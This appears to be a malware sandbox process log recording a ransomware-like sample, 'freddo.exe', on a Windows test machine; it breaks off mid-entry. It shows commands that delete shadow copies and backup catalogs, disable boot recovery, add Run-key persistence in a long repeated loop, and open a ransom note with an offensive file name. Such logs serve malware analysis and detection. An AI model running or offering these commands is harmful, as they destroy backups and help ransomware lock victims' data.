- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
  2⤵
  PID:3208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12484 /prefetch:1
  2⤵
  PID:6340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12008 /prefetch:1
  2⤵
  PID:7056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=137 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12640 /prefetch:1
  2⤵
  PID:7456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=138 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12532 /prefetch:1
  2⤵
  PID:3152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=139 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9648 /prefetch:1
  2⤵
  PID:6272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9496 /prefetch:8
  2⤵
  PID:1108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=142 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12236 /prefetch:1
  2⤵
  PID:6656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=12328 /prefetch:8
  2⤵
  PID:4772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10928 /prefetch:8
  2⤵
  PID:2520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=qrcode_generator.mojom.QRCodeGeneratorService --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8040 /prefetch:8
  2⤵
  PID:8148

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004CC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5108

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2232

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1176

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2516

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:7096

C:\Users\Admin\AppData\Local\Temp\Temp1_freddo.exe.zip\freddo.exe\freddo.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_freddo.exe.zip\freddo.exe\freddo.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5468

C:\Users\Admin\AppData\Local\Temp\Temp1_freddo.exe.zip\freddo.exe\freddo.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_freddo.exe.zip\freddo.exe\freddo.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6996

C:\Users\Admin\Documents\freddo.exe\freddo.exe
"C:\Users\Admin\Documents\freddo.exe\freddo.exe"
1⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6076
- C:\Users\Admin\AppData\Roaming\freddo.exe
  "C:\Users\Admin\AppData\Roaming\freddo.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Sets desktop wallpaper using registry
  - Modifies registry class
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  PID:5980
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
    3⤵
    PID:4552
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:6288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:504
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
    3⤵
    PID:5444
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:5164
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:6336
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    PID:2016
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog -quiet
      4⤵
      Deletes backup catalog
      PID:5232
- - C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\darkestpedo.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:4636

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4316

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5708

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:3976

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:5860

C:\Users\Admin\Documents\freddo.exe\Decrypter.exe
"C:\Users\Admin\Documents\freddo.exe\Decrypter.exe"
1⤵
PID:6100

C:\Users\Admin\Documents\freddo.exe\Decrypter.exe
"C:\Users\Admin\Documents\freddo.exe\Decrypter.exe"
1⤵
PID:6248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:3984

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:7932

C:\Users\Admin\Pictures\freddo.exe
"C:\Users\Admin\Pictures\freddo.exe"
1⤵
PID:8056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
  2⤵
  PID:352
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:5384
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:2288
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:7544
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:7128
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:5448
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:8024
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:3144
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:908
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:3348
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:8068
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:7728
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:5944
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:6520
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:6764
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:2404
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:3752
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:6920
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:4076
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:4996
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:2108
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:7796
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:6636
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7804
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:708
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:3544
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:6008
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:1324
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:7904
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7500
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:5144
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:6308
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:5432
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:6952
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7220
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:3576
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:3280
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:4384
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:296
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7624
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:2720
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:6032
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:5516
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:1780
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7368
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:5632
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:6784
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:5728
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:7408
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:6048
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:1368
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:5232
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:5484
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:6616
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7156
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:2668
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:5380
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:8116
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:6040
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7436
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:7444
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:5252
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:7752
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:5732
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:2316
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:7720
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:4960
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:296
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:6388
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:7008
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:6060
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:3812
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:908
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:1652
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:5924
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:1136
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:3996
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:6920
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7708
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:1536
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:7472
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:4548
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:7208
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:4664
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:6016
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:7696
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:1560
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:6436
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:2624
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:6248
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:2924
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:2164
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:7068
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:5924
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:4480
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:3432
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:7800
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:3632
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7564
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:5280
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:6316
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:7148
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:5124
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:5092
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7828
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:7856
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:6348
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:2976
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:1260
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:7300
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:4808
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:6668
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:2400
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:6920
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:8004
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:1324
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:6968
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:7904
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:6552
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:6768
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:6340
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:7820
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:7688
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:5740
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:6036
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:7048
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:7560
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:8160
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:1856
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:4440
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:3008
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:7204
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:668
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7532
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:5876
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:8116
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:7540
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:7468
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7448
- - C:\Windows\system32\reg.exe
